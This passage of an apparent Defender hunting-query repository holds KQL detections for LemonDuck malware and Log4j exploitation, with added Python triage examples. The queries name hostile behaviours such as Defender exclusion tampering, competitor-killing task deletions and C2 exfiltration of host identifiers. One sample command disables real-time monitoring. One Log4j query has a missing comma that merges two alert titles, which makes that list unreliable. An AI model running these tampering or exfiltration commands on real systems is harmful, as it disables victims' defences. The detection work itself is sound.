The following query checks for more than 5 instances of a .tk domain being contacted within a 10-minute interval. This malware frequently uses anywhere from 5 to 10 .TK domains, as well as other uncommon TLDs such as .blog, .site, .ml, and .gq, which appear randomly generated and are contacted after a query from a search engine to a hosting provider or advertising site. This activity is followed by the download of the malicious file.
## Query
```
DeviceNetworkEvents
| where RemoteUrl endswith ".tk"
| summarize make_set(RemoteUrl) by DeviceId,bin(Timestamp, 10m)
| extend domainCount = array_length(set_RemoteUrl)
| where domainCount >= 5
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-competition-killer.md
================================================
# LemonDuck competition killer script execution
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition before making the installation and persistence of the malware concrete. The killer script used is based on historical versions from 2018 and earlier and has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding.
```
DeviceProcessEvents
| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok")
| where DeleteVolume >= 40 and DeleteVolume <= 80
```
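The competition-killer query above and the Jupyter ".tk domain" query earlier share one shape: `summarize make_set(...) by <key>`, then `array_length` against a threshold. The following is an added Python example, not code from this repository, that implements that aggregate-and-threshold pattern once and applies it to both detections over constructed telemetry: a per-device, per-10-minute count of distinct .tk hosts, and a per-device count of distinct `schtasks /Delete` command lines with the marker task names from the query. `kql_bin` reproduces KQL `bin()` (epoch-aligned floor) and `kql_has` approximates KQL `has`; device IDs, host names and task names are constructed placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)

def kql_bin(ts: datetime, size: timedelta) -> datetime:
    """KQL bin(): round ts down to a multiple of size, aligned to the epoch."""
    return EPOCH + (ts - EPOCH) // size * size

def kql_has(text: str, term: str) -> bool:
    """Approximate KQL has: case-insensitive, term bounded by non-alphanumerics."""
    pat = r"(?<![0-9a-z])" + re.escape(term.lower()) + r"(?![0-9a-z])"
    return re.search(pat, text.lower()) is not None

def summarize_make_set(rows, key_fn, value_fn):
    """KQL `summarize make_set(value) by key`: distinct values seen per key."""
    sets = defaultdict(set)
    for row in rows:
        sets[key_fn(row)].add(value_fn(row))
    return dict(sets)

def tk_domain_bursts(network_events, window=timedelta(minutes=10), min_domains=5):
    """Mirrors 'successive .tk domain calls': (DeviceId, bin start, count) for
    every device/bin with at least min_domains distinct .tk hosts."""
    tk = [e for e in network_events if e["RemoteUrl"].lower().endswith(".tk")]
    sets = summarize_make_set(
        tk,
        key_fn=lambda e: (e["DeviceId"], kql_bin(e["Timestamp"], window)),
        value_fn=lambda e: e["RemoteUrl"],
    )
    return sorted((dev, start, len(urls))
                  for (dev, start), urls in sets.items() if len(urls) >= min_domains)

def schtasks_kill_volume(process_events, low=40, high=80,
                         markers=("Mysa", "Sorry", "Oracle Java Update", "ok")):
    """Mirrors 'LemonDuck competition killer': devices whose distinct
    `schtasks.exe /Delete /TN ... /F` lines number between low and high and
    include at least one known competitor task name."""
    deletes = [e for e in process_events
               if all(kql_has(e["ProcessCommandLine"], t)
                      for t in ("schtasks.exe", "/Delete", "/TN", "/F"))]
    sets = summarize_make_set(deletes, lambda e: e["DeviceId"],
                              lambda e: e["ProcessCommandLine"])
    hits = []
    for dev, lines in sets.items():
        volume = len(lines)                                   # array_length(set_...)
        named = any(kql_has(line, m) for line in lines for m in markers)  # has_any
        if named and low <= volume <= high:
            hits.append((dev, volume))
    return sorted(hits)

# Constructed sample telemetry (hypothetical devices, hosts and task names).
T0 = datetime(2021, 7, 1, 10, 0)
NETWORK_EVENTS = (
    # dev-a: six distinct .tk hosts inside the 10:00-10:10 bin -> flagged
    [{"DeviceId": "dev-a", "Timestamp": T0 + timedelta(minutes=i),
      "RemoteUrl": f"host{i}.tk"} for i in range(1, 7)]
    # a non-.tk connection in the same bin is ignored by the filter
    + [{"DeviceId": "dev-a", "Timestamp": T0 + timedelta(minutes=3),
        "RemoteUrl": "cdn.example.invalid"}]
    # a seventh host at 10:12 falls into the next bin and does not count
    + [{"DeviceId": "dev-a", "Timestamp": T0 + timedelta(minutes=12),
        "RemoteUrl": "host7.tk"}]
    # dev-b: only two .tk hosts -> below threshold
    + [{"DeviceId": "dev-b", "Timestamp": T0 + timedelta(minutes=2),
        "RemoteUrl": f"host{i}.tk"} for i in (1, 2)]
)

def _delete_line(task: str) -> str:
    return f'schtasks.exe /Delete /TN "{task}" /F'

PROCESS_EVENTS = (
    # dev-a: 45 distinct deletions including the "Mysa" marker -> flagged
    [{"DeviceId": "dev-a", "ProcessCommandLine": _delete_line(f"Task{i:02d}")}
     for i in range(44)]
    + [{"DeviceId": "dev-a", "ProcessCommandLine": _delete_line("Mysa")}]
    # dev-b: a handful of deletions -> below the lower bound
    + [{"DeviceId": "dev-b", "ProcessCommandLine": _delete_line(f"Task{i:02d}")}
       for i in range(3)]
    # dev-c: 50 deletions but no known competitor name -> not flagged
    + [{"DeviceId": "dev-c", "ProcessCommandLine": _delete_line(f"Task{i:02d}")}
       for i in range(50)]
)

if __name__ == "__main__":
    print(tk_domain_bursts(NETWORK_EVENTS))      # [('dev-a', T0, 6)]
    print(schtasks_kill_volume(PROCESS_EVENTS))  # [('dev-a', 45)]
```

The bin-edge case in the sample (a seventh host two minutes into the next bin) is worth keeping in mind when tuning the query: `bin()` is a fixed grid, not a sliding window, so a burst straddling a boundary can be split below the threshold.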
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-component-download-structure.md
================================================
# LemonDuck component download structure
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for any instance of the current version of the LemonDuck component collection commands, even if the component names change. This structure has changed and may continue to change over time in order to evade detection. It surfaces behavior that collects mining, secondary malware, and lateral movement executables from external sites. This query will typically return downloads of files such as "if.bin" or "kr.bin" or additional mining components.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("echo","tmp+",".bin","gmd5","downloaddata","down_url")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-component-names.md
================================================
# LemonDuck common external component names
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for instances of the callback actions that attempt to evade detection while downloading supporting scripts, such as those that enable the "Killer" and "Infection" functions for the malware, as well as the mining components and potential secondary functions. This query only encompasses the most common component names.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has_any("kr.bin","if.bin","m6.bin")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-control-structure.md
================================================
# LemonDuck command-and-control contact structure
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for the unique method LemonDuck uses to contact its command-and-control (C2) infrastructure in order to register updates from the bot client or exfiltrate data. This structure has changed over time; the iteration matched here is the most recent one, observed active from June to July 2021 and as of this report.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where InitiatingProcessCommandLine has_all("Exponent=","FromBase64String","$url+")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-defender-exclusions.md
================================================
# LemonDuck Microsoft Defender drive exclusion tampering
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring or by adding entire drive letters to the exclusion list. The exclusion additions will often succeed even if tamper protection is enabled, due to the design of the application. Custom alerts could be created in an environment for the particular drive letters common in that environment.
```
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```
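The command lines that the query above surfaces can be triaged further. As an added illustration (not one of this repository's queries), the following Python parses `Set-MpPreference`/`Add-MpPreference` invocations and separates whole-drive exclusions and real-time monitoring being switched off from ordinary path or process exclusions, which is the raw material for the per-drive-letter custom alerts the description mentions. The command lines are constructed samples; the cmdlet and parameter names are the real Defender PowerShell ones, but the regex-based argument parsing is an approximation of PowerShell's own parsing and is an assumption of this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample command lines (not from real telemetry). The cmdlets and
# parameters (Set-MpPreference, Add-MpPreference, -ExclusionPath, -ExclusionProcess,
# -ExclusionExtension, -DisableRealtimeMonitoring) are the real Defender PowerShell names.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
    'Add-MpPreference -ExclusionPath C:\\ -ExclusionPath D:\\ -ExclusionProcess powershell.exe"',
    'powershell.exe -c "Add-MpPreference -ExclusionPath \'C:\\Program Files\\MyApp\'"',
    'powershell.exe -c "Get-MpPreference"',
]

# A parameter value: single-quoted, double-quoted, or a bare token that is not another
# parameter; comma-separated lists are accepted because the cmdlets take string arrays.
_VALUE = r"""'[^']*'|"[^"]*"|(?!-)[^\s;,"']+"""
PARAM = re.compile(
    r"-(ExclusionPath|ExclusionProcess|ExclusionExtension|DisableRealtimeMonitoring)"
    r"\s+((?:" + _VALUE + r")(?:\s*,\s*(?:" + _VALUE + r"))*)",
    re.IGNORECASE,
)
# A whole drive: one letter, a colon, and at most a trailing backslash.
WHOLE_DRIVE = re.compile(r"^[A-Za-z]:\\?$")
MPPREF = re.compile(r"(Set|Add)-MpPreference", re.IGNORECASE)


@dataclass
class ExclusionFindings:
    realtime_disabled: bool = False
    whole_drive_exclusions: list = field(default_factory=list)
    process_exclusions: list = field(default_factory=list)
    other_exclusions: list = field(default_factory=list)


def _split_values(raw):
    """Split a comma-separated PowerShell argument list and drop surrounding quotes."""
    parts = [p.strip().strip("'\"") for p in re.split(r"\s*,\s*", raw)]
    return [p for p in parts if p]


def analyze_command_line(cmd):
    """Extract Defender exclusion and real-time-monitoring changes from one command line."""
    findings = ExclusionFindings()
    if not MPPREF.search(cmd):
        return findings
    for m in PARAM.finditer(cmd):
        name = m.group(1).lower()
        values = _split_values(m.group(2))
        if name == "disablerealtimemonitoring":
            findings.realtime_disabled = any(v.lower() in ("$true", "1", "true") for v in values)
        elif name == "exclusionprocess":
            findings.process_exclusions.extend(values)
        elif name == "exclusionpath":
            for v in values:
                if WHOLE_DRIVE.match(v):
                    findings.whole_drive_exclusions.append(v.rstrip("\\").upper())
                else:
                    findings.other_exclusions.append(v)
        else:
            findings.other_exclusions.extend(values)
    return findings


def severity(findings):
    """Whole-drive exclusions or real-time monitoring switched off are the high-impact cases."""
    if findings.whole_drive_exclusions or findings.realtime_disabled:
        return "high"
    if findings.process_exclusions or findings.other_exclusions:
        return "medium"
    return "none"


def triage(command_lines):
    """Return (severity, findings) per command line, highest severity first."""
    order = {"high": 0, "medium": 1, "none": 2}
    rows = [(severity(f), f) for f in map(analyze_command_line, command_lines)]
    return sorted(rows, key=lambda r: order[r[0]])


if __name__ == "__main__":
    for sev, f in triage(SAMPLE_COMMAND_LINES):
        print(sev, f)
```

Feeding `ProcessCommandLine` and `InitiatingProcessCommandLine` from the query's results into `triage` gives an ordering in which whole-drive exclusions and disabled real-time monitoring surface first; the drive letters in `whole_drive_exclusions` are what a per-environment custom alert would key on.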
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-email-subjects.md
================================================
# LemonDuck Email Subjects
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for subject lines present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and send them to the contacts of mailboxes on impacted machines. It also checks whether attachments are present. General attachment types to check for at present are .doc, .zip, or .js, though these could change, as could the subjects themselves.
```
EmailEvents
| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',
'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')
| where AttachmentCount >= 1
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-id-generation.md
================================================
# LemonDuck command-and-control ID generation
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query checks for the current method of exfiltrating basic component information to LemonDuck command-and-control servers. Previous iterations used other methods; currently this logic is included at the end of the callout to the server to identify the client.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where InitiatingProcessCommandLine endswith "(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-registration-function.md
================================================
# LemonDuck botnet registration functions
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for instances of function runs with the name “SIEX”, which within the LemonDuck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites.
```
DeviceEvents
| where ActionType == "PowerShellCommand"
| where AdditionalFields =~ "{\"Command\":\"SIEX\"}"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Alerts related to Log4j vulnerability.md
================================================
# Alerts related to Log4j vulnerability
Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.
## Query
This query looks for alerts related to the Log4J vulnerability. Devices with these alerts should be investigated for potential malicious activity.
```
AlertInfo
| where Title in~('Suspicious script launched',
'Exploitation attempt against Log4j (CVE-2021-44228)',
'Suspicious process executed by a network service',
'Possible target of Log4j exploitation (CVE-2021-44228)',
'Possible target of Log4j exploitation',
'Possible Log4j exploitation',
'Network connection seen in CVE-2021-44228 exploitation',
'Log4j exploitation detected',
'Possible exploitation of CVE-2021-44228',
'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
'Possible source of Log4j exploitation',
'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Devices with Log4j vulnerability alerts and additional other alert related context.md
================================================
# Devices with Log4j vulnerability alerts and additional other alert related context
Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.
## Query
This query looks for devices that have alerts for suspected Log4J vulnerability exploitation, and identifies other alerts that have been observed on the device within a given timeframe.
```
// Get any devices with Log4J related Alert Activity
let DevicesLog4JAlerts = AlertInfo
| where Title in~('Suspicious script launched',
'Exploitation attempt against Log4j (CVE-2021-44228)',
'Suspicious process executed by a network service',
'Possible target of Log4j exploitation (CVE-2021-44228)',
'Possible target of Log4j exploitation',
'Possible Log4j exploitation',
'Network connection seen in CVE-2021-44228 exploitation',
'Log4j exploitation detected',
'Possible exploitation of CVE-2021-44228',
'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
'Possible source of Log4j exploitation'
'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
)
// Join in evidence information
| join AlertEvidence on AlertId
| where DeviceId != ""
| summarize by DeviceId, Title;
// Get additional alert activity for each device
AlertEvidence
| where DeviceId in(DevicesLog4JAlerts)
// Add additional info
| join kind=leftouter AlertInfo on AlertId
| summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)
```
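The two-stage join in this query (devices that carry a Log4j alert, then every alert seen on those devices per day) is easy to misread, so here it is as an added Python illustration that is not one of the repository's queries. The `AlertInfo` and `AlertEvidence` rows are constructed samples shaped like the columns the query uses; the title list is the query's own. The sample deliberately includes evidence with an empty `DeviceId` (mailbox evidence), an evidence row with no matching `AlertInfo` row, and a device that shares an alert with a Log4j-affected device but has no Log4j alert itself, so that each filter in the query does visible work.

```python
from collections import defaultdict
from datetime import datetime

# Alert titles the query above matches; compared case-insensitively like KQL's `in~`.
LOG4J_ALERT_TITLES = {t.lower() for t in (
    "Suspicious script launched",
    "Exploitation attempt against Log4j (CVE-2021-44228)",
    "Suspicious process executed by a network service",
    "Possible target of Log4j exploitation (CVE-2021-44228)",
    "Possible target of Log4j exploitation",
    "Possible Log4j exploitation",
    "Network connection seen in CVE-2021-44228 exploitation",
    "Log4j exploitation detected",
    "Possible exploitation of CVE-2021-44228",
    "Possible target of Log4j vulnerability (CVE-2021-44228) scanning",
    "Possible source of Log4j exploitation",
    "Log4j exploitation attempt via cloud application",
    "Log4j exploitation attempt via email",
)}

# Constructed sample rows (not real telemetry). AlertInfo: one row per alert.
ALERT_INFO = [
    {"AlertId": "a1", "Title": "Possible target of Log4j exploitation"},
    {"AlertId": "a2", "Title": "Suspicious PowerShell command line"},
    {"AlertId": "a3", "Title": "Log4j exploitation attempt via email"},
    {"AlertId": "a4", "Title": "SUSPICIOUS SCRIPT LAUNCHED"},   # case differs; in~ still matches
]
# AlertEvidence: one row per evidence item; DeviceId is empty for non-device evidence.
ALERT_EVIDENCE = [
    {"AlertId": "a1", "DeviceId": "dev-1", "Timestamp": "2021-12-12T08:00:00"},
    {"AlertId": "a2", "DeviceId": "dev-1", "Timestamp": "2021-12-12T09:30:00"},
    {"AlertId": "a5", "DeviceId": "dev-1", "Timestamp": "2021-12-12T12:00:00"},  # no AlertInfo row
    {"AlertId": "a3", "DeviceId": "", "Timestamp": "2021-12-13T11:00:00"},       # mailbox evidence
    {"AlertId": "a4", "DeviceId": "dev-2", "Timestamp": "2021-12-12T10:00:00"},
    {"AlertId": "a2", "DeviceId": "dev-3", "Timestamp": "2021-12-12T09:31:00"},  # no Log4j alert here
]


def devices_with_log4j_alerts(alert_info, alert_evidence):
    """Stage 1 (the `let` block): devices carrying at least one Log4j-related alert."""
    log4j_alert_ids = {a["AlertId"] for a in alert_info
                       if a["Title"].lower() in LOG4J_ALERT_TITLES}
    # inner join AlertEvidence on AlertId, then drop evidence that names no device
    return {e["DeviceId"] for e in alert_evidence
            if e["AlertId"] in log4j_alert_ids and e["DeviceId"] != ""}


def day_bin(timestamp):
    """bin(Timestamp, 1d): the calendar day the event falls in."""
    return datetime.fromisoformat(timestamp).date().isoformat()


def alert_context_by_device_day(alert_info, alert_evidence):
    """Stage 2: every alert on those devices, grouped by device and day."""
    devices = devices_with_log4j_alerts(alert_info, alert_evidence)
    titles = {a["AlertId"]: a["Title"] for a in alert_info}
    grouped = defaultdict(lambda: {"DeviceAlerts": set(), "AlertIDs": set()})
    for e in alert_evidence:
        if e["DeviceId"] not in devices:        # DeviceId in(DevicesLog4JAlerts)
            continue
        key = (e["DeviceId"], day_bin(e["Timestamp"]))
        grouped[key]["AlertIDs"].add(e["AlertId"])
        # kind=leftouter keeps evidence without an AlertInfo row; make_set(Title)
        # skips the null title that row would carry
        if e["AlertId"] in titles:
            grouped[key]["DeviceAlerts"].add(titles[e["AlertId"]])
    return {k: {"DeviceAlerts": sorted(v["DeviceAlerts"]), "AlertIDs": sorted(v["AlertIDs"])}
            for k, v in sorted(grouped.items())}


if __name__ == "__main__":
    for (device, day), row in alert_context_by_device_day(ALERT_INFO, ALERT_EVIDENCE).items():
        print(device, day, row)
```

With the sample rows, `dev-3` never appears in the output even though it shares alert `a2` with `dev-1`, and the mailbox evidence for `a3` contributes no device; the output for `dev-1` still lists `a5` because the second join is a left outer join.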
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Suspicious JScript staging comment.md
================================================
# Suspicious JScript staging comment
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.
## Query
This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has "VMBlastSG"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Suspicious PowerShell curl flags.md
================================================
# Suspicious PowerShell curl flags
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing uncommon PowerShell flags to communicate to command-and-control infrastructure.
## Query
This query identifies unique, uncommon PowerShell flags used with curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the “Body” argument are the Base64-encoded results of an attacker-issued command. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_all("-met", "POST", "-Body")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
